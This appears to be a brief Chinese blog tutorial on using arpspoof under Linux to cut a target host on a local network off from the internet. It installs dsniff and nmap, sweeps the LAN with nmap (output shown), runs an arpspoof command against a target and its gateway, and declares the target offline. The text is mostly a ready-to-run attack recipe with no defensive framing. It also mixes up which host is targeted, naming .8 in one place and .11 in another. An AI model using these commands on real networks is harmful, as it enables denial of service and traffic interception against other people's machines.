Linux下的ARP攻击-断网

1、软件工具安装

1. nmap           --网络嗅探工具

2. dsniff ( arpspoof )       --ARP嗅探工具

3. net-tools ( ifconfig )    --网络工具

sudo apt-get install dsniff
sudo apt-get install net-tools
sudo apt-get install nmap

2、查看当前局域网下的所有主机

umlinux@umlinux-PC:~$ nmap -sP 192.168.89.*  
Starting Nmap 7.70 ( https://nmap.org ) at 2020-11-11 17:50 CST
Nmap scan report for wifi.cmcc.cn (192.168.89.1)
Host is up (0.00035s latency).
Nmap scan report for 192.168.89.8
Host is up (0.000052s latency).
Nmap scan report for 192.168.89.11
Host is up (0.0034s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 3.01 second
//由此可以得到有2个主机在局域网下,192.168.89.8 和 192.168.89.1

3、使用arpspoof命令对192.168.89.8主机断网   #sudo arpspoof -i 网卡 -t 目标主机ip -r 网关

umlinux@umlinux-PC:~$ sudo arpspoof -i enp2s0 -t 192.168.89.11 -r 192.168.89.1 

4、此时192.168.89.11的主机就已经断网了,已经不能再上网了

参考:ARP攻击原理:https://www.cnblogs.com/csguo/p/7527073.html

上一篇:HDU 4372 Count the Buildings [第一类斯特林数]


下一篇:Linux下基本栈溢出攻击【转】